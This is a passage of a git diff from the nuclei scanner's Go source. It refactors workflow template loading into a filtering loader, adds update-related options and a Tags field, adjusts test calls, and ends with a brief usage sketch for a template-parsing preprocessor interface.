NoColor bool // UpdateTemplates updates the templates installed at startup @@ -130,4 +144,8 @@ type Options struct { NewTemplates bool // NoInteractsh disables use of interactsh server for interaction polling NoInteractsh bool + // UpdateNuclei checks for an update for the nuclei engine + UpdateNuclei bool + // NoUpdateTemplates disables checking for nuclei templates updates + NoUpdateTemplates bool } diff --git a/v2/pkg/workflows/compile.go b/v2/pkg/workflows/compile.go deleted file mode 100644 index 59d45e0623..0000000000 --- a/v2/pkg/workflows/compile.go +++ /dev/null @@ -1,30 +0,0 @@ -package workflows - -import ( - "os" - - "github.com/pkg/errors" - "github.com/projectdiscovery/nuclei/v2/pkg/protocols" - "gopkg.in/yaml.v2" -) - -// Parse a yaml workflow file -func Parse(file string, options *protocols.ExecuterOptions) (*Workflow, error) { - workflow := &Workflow{Options: options} - - f, err := os.Open(file) - if err != nil { - return nil, err - } - defer f.Close() - - err = yaml.NewDecoder(f).Decode(workflow) - if err != nil { - return nil, err - } - - if len(workflow.Workflows) == 0 { - return nil, errors.New("no workflow defined") - } - return workflow, nil -} diff --git a/v2/pkg/workflows/compile/compile.go b/v2/pkg/workflows/compile/compile.go new file mode 100644 index 0000000000..a7d82faed4 --- /dev/null +++ b/v2/pkg/workflows/compile/compile.go @@ -0,0 +1,73 @@ +package compile + +import ( + "github.com/projectdiscovery/gologger" + "github.com/projectdiscovery/nuclei/v2/pkg/catalog/loader/filter" + "github.com/projectdiscovery/nuclei/v2/pkg/catalog/loader/load" + "github.com/projectdiscovery/nuclei/v2/pkg/protocols" +) + +// WorkflowLoader is a loader interface required for workflow +// initialization. +type WorkflowLoader interface { + // ListTags lists a list of templates for tags from the provided templates directory + ListTags(tags []string) []string + // ListTemplates takes a list of templates and returns paths for them + ListTemplates(templatesList []string, noValidate bool) []string +} + +type workflowLoader struct { + pathFilter *filter.PathFilter + tagFilter *filter.TagFilter + options *protocols.ExecuterOptions +} + +// NewLoader returns a new workflow loader structure +func NewLoader(options *protocols.ExecuterOptions) (WorkflowLoader, error) { + tagFilter := filter.New(&filter.Config{ + Tags: options.Options.Tags, + ExcludeTags: options.Options.ExcludeTags, + Authors: options.Options.Author, + Severities: options.Options.Severity, + IncludeTags: options.Options.IncludeTags, + }) + pathFilter := filter.NewPathFilter(&filter.PathFilterConfig{ + IncludedTemplates: options.Options.IncludeTemplates, + ExcludedTemplates: options.Options.ExcludedTemplates, + }, options.Catalog) + return &workflowLoader{pathFilter: pathFilter, tagFilter: tagFilter, options: options}, nil +} + +// ListTags lists a list of templates for tags from the provided templates directory +func (w *workflowLoader) ListTags(tags []string) []string { + includedTemplates := w.options.Catalog.GetTemplatesPath([]string{w.options.Options.TemplatesDirectory}) + templatesMap := w.pathFilter.Match(includedTemplates) + + loadedTemplates := make([]string, 0, len(templatesMap)) + for k := range templatesMap { + loaded, err := load.Load(k, false, tags, w.tagFilter) + if err != nil { + gologger.Warning().Msgf("Could not load template %s: %s\n", k, err) + } else if loaded { + loadedTemplates = append(loadedTemplates, k) + } + } + return loadedTemplates +} + +// ListTemplates takes a list of templates and returns 
paths for them +func (w *workflowLoader) ListTemplates(templatesList []string, noValidate bool) []string { + includedTemplates := w.options.Catalog.GetTemplatesPath(templatesList) + templatesMap := w.pathFilter.Match(includedTemplates) + + loadedTemplates := make([]string, 0, len(templatesMap)) + for k := range templatesMap { + matched, err := load.Load(k, false, nil, w.tagFilter) + if err != nil { + gologger.Warning().Msgf("Could not load template %s: %s\n", k, err) + } else if matched || noValidate { + loadedTemplates = append(loadedTemplates, k) + } + } + return loadedTemplates +} diff --git a/v2/pkg/workflows/execute.go b/v2/pkg/workflows/execute.go index 3356875bb1..163cc98243 100644 --- a/v2/pkg/workflows/execute.go +++ b/v2/pkg/workflows/execute.go @@ -48,7 +48,11 @@ func (w *Workflow) runWorkflowStep(template *WorkflowTemplate, input string, res } }) } else { - firstMatched, err = executer.Executer.Execute(input) + var matched bool + matched, err = executer.Executer.Execute(input) + if matched { + firstMatched = true + } } if err != nil { if len(template.Executers) == 1 { diff --git a/v2/pkg/workflows/execute_test.go b/v2/pkg/workflows/execute_test.go index 67caa8cf7a..26f7c2b994 100644 --- a/v2/pkg/workflows/execute_test.go +++ b/v2/pkg/workflows/execute_test.go @@ -12,7 +12,7 @@ import ( ) func TestWorkflowsSimple(t *testing.T) { - progressBar, _ := progress.NewStatsTicker(0, false, false, 0) + progressBar, _ := progress.NewStatsTicker(0, false, false, false, 0) workflow := &Workflow{Options: &protocols.ExecuterOptions{Options: &types.Options{TemplateThreads: 10}}, Workflows: []*WorkflowTemplate{ {Executers: []*ProtocolExecuterPair{{ @@ -25,7 +25,7 @@ func TestWorkflowsSimple(t *testing.T) { } func TestWorkflowsSimpleMultiple(t *testing.T) { - progressBar, _ := progress.NewStatsTicker(0, false, false, 0) + progressBar, _ := progress.NewStatsTicker(0, false, false, false, 0) var firstInput, secondInput string workflow := &Workflow{Options: &protocols.ExecuterOptions{Options: &types.Options{TemplateThreads: 10}}, Workflows: []*WorkflowTemplate{ @@ -49,7 +49,7 @@ func TestWorkflowsSimpleMultiple(t *testing.T) { } func TestWorkflowsSubtemplates(t *testing.T) { - progressBar, _ := progress.NewStatsTicker(0, false, false, 0) + progressBar, _ := progress.NewStatsTicker(0, false, false, false, 0) var firstInput, secondInput string workflow := &Workflow{Options: &protocols.ExecuterOptions{Options: &types.Options{TemplateThreads: 10}}, Workflows: []*WorkflowTemplate{ @@ -74,7 +74,7 @@ func TestWorkflowsSubtemplates(t *testing.T) { } func TestWorkflowsSubtemplatesNoMatch(t *testing.T) { - progressBar, _ := progress.NewStatsTicker(0, false, false, 0) + progressBar, _ := progress.NewStatsTicker(0, false, false, false, 0) var firstInput, secondInput string workflow := &Workflow{Options: &protocols.ExecuterOptions{Options: &types.Options{TemplateThreads: 10}}, Workflows: []*WorkflowTemplate{ @@ -97,7 +97,7 @@ func TestWorkflowsSubtemplatesNoMatch(t *testing.T) { } func TestWorkflowsSubtemplatesWithMatcher(t *testing.T) { - progressBar, _ := progress.NewStatsTicker(0, false, false, 0) + progressBar, _ := progress.NewStatsTicker(0, false, false, false, 0) var firstInput, secondInput string workflow := &Workflow{Options: &protocols.ExecuterOptions{Options: &types.Options{TemplateThreads: 10}}, Workflows: []*WorkflowTemplate{ @@ -125,7 +125,7 @@ func TestWorkflowsSubtemplatesWithMatcher(t *testing.T) { } func TestWorkflowsSubtemplatesWithMatcherNoMatch(t *testing.T) { - progressBar, _ := 
progress.NewStatsTicker(0, false, false, 0) + progressBar, _ := progress.NewStatsTicker(0, false, false, false, 0) var firstInput, secondInput string workflow := &Workflow{Options: &protocols.ExecuterOptions{Options: &types.Options{TemplateThreads: 10}}, Workflows: []*WorkflowTemplate{ diff --git a/v2/pkg/workflows/workflows.go b/v2/pkg/workflows/workflows.go index 91a8ae3407..caae63a6da 100644 --- a/v2/pkg/workflows/workflows.go +++ b/v2/pkg/workflows/workflows.go @@ -14,6 +14,8 @@ type Workflow struct { type WorkflowTemplate struct { // Template is the template to run Template string `yaml:"template"` + // Tags to perform filtering of supplied templates on + Tags string `yaml:"tags"` // Matchers perform name based matching to run subtemplates for a workflow. Matchers []*Matcher `yaml:"matchers"` // Subtemplates are ran if the template matches.
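
A minimal usage sketch of the API reshaped above, assuming only what the hunks show: templates.Parse now takes a Preprocessor as its second argument, templates.Preprocessor is satisfied by any type with a Process([]byte) []byte method, and Parse now records Template.Path. The noopPreprocessor type and loadTemplate helper are hypothetical names used purely for illustration, not part of this change.

package main

import (
	"log"

	"github.com/projectdiscovery/nuclei/v2/pkg/protocols"
	"github.com/projectdiscovery/nuclei/v2/pkg/templates"
)

// noopPreprocessor satisfies templates.Preprocessor without changing the data.
type noopPreprocessor struct{}

func (noopPreprocessor) Process(data []byte) []byte { return data }

// loadTemplate parses a single template file using the new three-argument Parse.
func loadTemplate(path string, opts protocols.ExecuterOptions) *templates.Template {
	// A nil preprocessor is also accepted; Parse only calls Process when one is set.
	tmpl, err := templates.Parse(path, noopPreprocessor{}, opts)
	if err != nil {
		log.Printf("could not parse %s: %v", path, err)
		return nil
	}
	// Template.Path is populated by Parse with the source file location.
	log.Printf("parsed template %s from %s", tmpl.ID, tmpl.Path)
	return tmpl
}

Callers that need no data rewriting can simply pass nil for the preprocessor; the interface exists so a caller can transform the raw template bytes before YAML decoding, which is exactly where Parse invokes Process in the hunk above.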